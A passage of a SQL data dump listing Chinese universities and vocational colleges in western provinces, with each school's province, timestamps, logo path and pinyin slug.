17:40:39','/images/school/default.png','yunnanguofanggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2132,'云南机电职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanjidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2133,'云南林业职业技术学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanlinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2134,'云南新兴职业学院','云南省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yunnanxinxingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2135,'西藏大学','西藏自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xicangdaxue',0,NULL,NULL,0,NULL,NULL),(2136,'西藏民族大学','西藏自治区','2014-04-23 00:00:00','2017-09-04 17:54:49','/images/school/default.png','xicangminzuxueyuan',0,NULL,NULL,0,NULL,NULL),(2137,'西藏藏医学院','西藏自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xicangcangyixueyuan',0,NULL,NULL,0,NULL,NULL),(2138,'西藏警官高等专科学校','西藏自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xicangjingguangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2139,'拉萨师范高等专科学校','西藏自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lasashifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2140,'西藏职业技术学院','西藏自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xicangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2141,'西安交通大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianjiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(2142,'西安电子科技大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiandianzikejidaxue',0,NULL,NULL,1,NULL,'2018-01-01 10:00:00'),(2143,'长安大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','changandaxue',0,NULL,NULL,0,NULL,NULL),(2144,'西北农林科技大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeinonglinkejidaxue',0,NULL,NULL,0,NULL,NULL),(2145,'陕西师范大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxishifandaxue',0,NULL,NULL,0,NULL,NULL),(2146,'西北工业大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeigongyedaxue',0,NULL,NULL,0,NULL,NULL),(2147,'西北大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeidaxue',0,NULL,NULL,0,NULL,NULL),(2148,'西安理工大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianligongdaxue',0,NULL,NULL,0,NULL,NULL),(2149,'西安工业大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiangongyedaxue',0,NULL,NULL,0,NULL,NULL),(2150,'西安建筑科技大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianjianzhukejidaxue',0,NULL,NULL,0,NULL,NULL),(2151,'西安科技大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiankejidaxue',0,NULL,NULL,0,NULL,NULL),(2152,'西安石油大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianshiyoudaxue',0,NULL,NULL,0,NULL,NULL),(2153,'陕西科技大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxikejidaxue',0,NULL,NULL,0,NULL,NULL),(2154,'西安工程大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiangongchengdaxue',0,NULL,NULL,0,NULL,NULL),(2155,'延安大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yanandaxue',0,NULL,NULL,0,NULL,NULL),(2156,'西安外国语大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(2157,'西北政法大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeizhengfadaxue',0,NULL,NULL,0,NULL,NULL),(2158,'西安邮电大学','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyoudiandaxue',0,NULL,NULL,0,NULL,NULL),(2159,'陕西中医学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxizhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(2160,'陕西理工学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiligongxueyuan',0,NULL,NULL,0,NULL,NULL),(2161,'宝鸡文理学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','baojiwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(2162,'咸阳师范学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2163,'渭南师范学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','weinanshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2164,'西安体育学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiantiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(2165,'西安音乐学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(2166,'西安美术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianmeishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2167,'西安文理学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(2168,'榆林学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yulinxueyuan',0,NULL,NULL,0,NULL,NULL),(2169,'商洛学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shangluoxueyuan',0,NULL,NULL,0,NULL,NULL),(2170,'安康学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ankangxueyuan',0,NULL,NULL,0,NULL,NULL),(2171,'西安培华学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianpeihuaxueyuan',0,NULL,NULL,0,NULL,NULL),(2172,'西安财经学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiancaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(2173,'西安航空学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianhangkongxueyuan',0,NULL,NULL,0,NULL,NULL),(2174,'西安医学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyixueyuan',0,NULL,NULL,0,NULL,NULL),(2175,'西安思源学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiansiyuanxueyuan',0,NULL,NULL,0,NULL,NULL),(2176,'陕西国际商贸学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiguojishangmaoxueyuan',0,NULL,NULL,0,NULL,NULL),(2177,'陕西服装工程学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxifuzhuanggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(2178,'陕西学前师范学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxixueqianshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2179,'西安欧亚学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianouyaxueyuan',0,NULL,NULL,0,NULL,NULL),(2180,'西安外事学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianwaishixueyuan',0,NULL,NULL,0,NULL,NULL),(2181,'西安翻译学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianfanyixueyuan',0,NULL,NULL,0,NULL,NULL),(2182,'西京学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xijingxueyuan',0,NULL,NULL,0,NULL,NULL),(2183,'西安电力高等专科学校','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiandianligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2184,'西安医学高等专科学校','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2185,'陕西工业职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxigongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2186,'杨凌职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yanglingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2187,'西安城市建设职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianchengshijianshezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2188,'陕西工商职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxigongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2189,'榆林职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yulinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2190,'陕西艺术职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2191,'陕西能源职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxinengyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2192,'陕西国防工业职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiguofanggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2193,'西安航空职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianhangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2194,'陕西财经职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxicaijingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2195,'陕西交通职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2196,'陕西职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2197,'西安高新科技职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiangaoxinkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2198,'陕西铁路工程职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxitielugongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2199,'宝鸡职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','baojizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2200,'陕西航空职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxihangkongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2201,'西安科技商贸职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiankejishangmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2202,'陕西电子信息职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxidianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2203,'陕西邮电职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiyoudianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2204,'西安海棠职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianhaitangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2205,'西安汽车科技职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianqichekejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2206,'西安东方亚太职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiandongfangyataizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2207,'陕西警官职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxijingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2208,'陕西经济管理职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxijingjiguanlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2209,'西安铁路职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xiantieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2210,'咸阳职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2211,'西安职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2212,'商洛职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shangluozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2213,'汉中职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','hanzhongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2214,'延安职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yananzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2215,'渭南职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','weinanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2216,'安康职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ankangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2217,'铜川职业技术学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','tongchuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2218,'陕西青年职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxiqingnianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2219,'陕西电子科技职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxidianzikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2220,'陕西旅游烹饪职业学院','陕西省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shanxilvyoupengrenzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2221,'兰州大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhoudaxue',0,NULL,NULL,0,NULL,NULL),(2222,'西北民族大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeiminzudaxue',0,NULL,NULL,0,NULL,NULL),(2223,'兰州理工大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/2223.png','lanzhouligongdaxue',0,NULL,NULL,0,NULL,NULL),(2224,'兰州交通大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhoujiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(2225,'甘肃农业大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansunongyedaxue',0,NULL,NULL,0,NULL,NULL),(2226,'西北师范大学','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xibeishifandaxue',0,NULL,NULL,0,NULL,NULL),(2227,'甘肃中医学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansuzhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(2228,'兰州城市学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhouchengshixueyuan',0,NULL,NULL,0,NULL,NULL),(2229,'陇东学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','longdongxueyuan',0,NULL,NULL,0,NULL,NULL),(2230,'天水师范学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','tianshuishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2231,'河西学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','hexixueyuan',0,NULL,NULL,0,NULL,NULL),(2232,'兰州商学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhoushangxueyuan',0,NULL,NULL,0,NULL,NULL),(2233,'甘肃政法学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansuzhengfaxueyuan',0,NULL,NULL,0,NULL,NULL),(2234,'甘肃民族师范学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansuminzushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2235,'兰州文理学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhouwenlixueyuan',0,NULL,NULL,0,NULL,NULL),(2236,'兰州工业学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhougongyexueyuan',0,NULL,NULL,0,NULL,NULL),(2237,'平凉医学高等专科学校','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','pingliangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2238,'陇南师范高等专科学校','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','longnanshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2239,'定西师范高等专科学校','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','dingxishifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2240,'张掖医学高等专科学校','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','zhangyeyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2241,'兰州石化职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhoushihuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2242,'甘肃钢铁职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansugangtiezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2243,'甘肃机电职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansujidianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2244,'甘肃有色冶金职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansuyouseyejinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2245,'白银矿冶职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','baiyinkuangyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2246,'甘肃建筑职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansujianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2247,'酒泉职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','jiuquanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2248,'兰州外语职业学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhouwaiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2249,'兰州职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2250,'甘肃警察职业学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansujingchazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2251,'甘肃林业职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansulinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2252,'甘肃工业职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansugongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2253,'武威职业学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','wuweizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2254,'甘肃交通职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansujiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2255,'兰州资源环境职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','lanzhouziyuanhuanjingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2256,'甘肃农业职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansunongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2257,'甘肃畜牧工程职业技术学院','甘肃省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','gansuchumugongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2258,'青海大学','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaidaxue',0,NULL,NULL,0,NULL,NULL),(2259,'青海师范大学','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaishifandaxue',0,NULL,NULL,0,NULL,NULL),(2260,'青海民族大学','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaiminzudaxue',0,NULL,NULL,0,NULL,NULL),(2261,'青海卫生职业技术学院','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaiweishengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2262,'青海警官职业学院','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaijingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2263,'青海畜牧兽医职业技术学院','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaichumushouyizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2264,'青海交通职业技术学院','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2265,'青海建筑职业技术学院','青海省','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','qinghaijianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2266,'北方民族大学','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','beifangminzudaxue',0,NULL,NULL,0,NULL,NULL),(2267,'宁夏大学','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiadaxue',0,NULL,NULL,0,NULL,NULL),(2268,'宁夏医科大学','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiayikedaxue',0,NULL,NULL,0,NULL,NULL),(2269,'宁夏师范学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiashifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2270,'银川能源学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yinchuannengyuanxueyuan',0,NULL,NULL,0,NULL,NULL),(2271,'宁夏理工学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxialigongxueyuan',0,NULL,NULL,0,NULL,NULL),(2272,'宁夏防沙治沙职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiafangshazhishazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2273,'宁夏民族职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiaminzuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2274,'宁夏工业职业学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiagongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2275,'宁夏职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2276,'宁夏工商职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiagongshangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2277,'宁夏财经职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiacaijingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2278,'宁夏司法警官职业学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiasifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(2279,'宁夏建设职业技术学院','宁夏回族自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','ningxiajianshezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2280,'新疆大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangdaxue',0,NULL,NULL,0,NULL,NULL),(2281,'塔里木大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','talimudaxue',0,NULL,NULL,0,NULL,NULL),(2282,'新疆农业大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangnongyedaxue',0,NULL,NULL,0,NULL,NULL),(2283,'石河子大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','shihezidaxue',0,NULL,NULL,0,NULL,NULL),(2284,'新疆医科大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangyikedaxue',0,NULL,NULL,0,NULL,NULL),(2285,'新疆师范大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangshifandaxue',0,NULL,NULL,0,NULL,NULL),(2286,'新疆财经大学','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(2287,'喀什大学',' 新疆维吾尔自治区','2014-04-23 00:00:00','2017-09-04 17:56:16','/images/school/default.png','kashishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2288,'伊犁师范学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','yilishifanxueyuan',0,NULL,NULL,0,NULL,NULL),(2289,'新疆艺术学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(2290,'新疆工程学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjianggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(2291,'昌吉学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','changjixueyuan',0,NULL,NULL,0,NULL,NULL),(2292,'新疆警察学院','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(2293,'和田师范专科学校','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','hetianshifanzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2294,'新疆维吾尔医学专科学校','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 17:40:39','/images/school/default.png','xinjiangweiwueryixuezhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(2295,'新疆师范高等专科学校','新疆维吾尔自治区','2014-04-23 00:00:00','2015-10-16 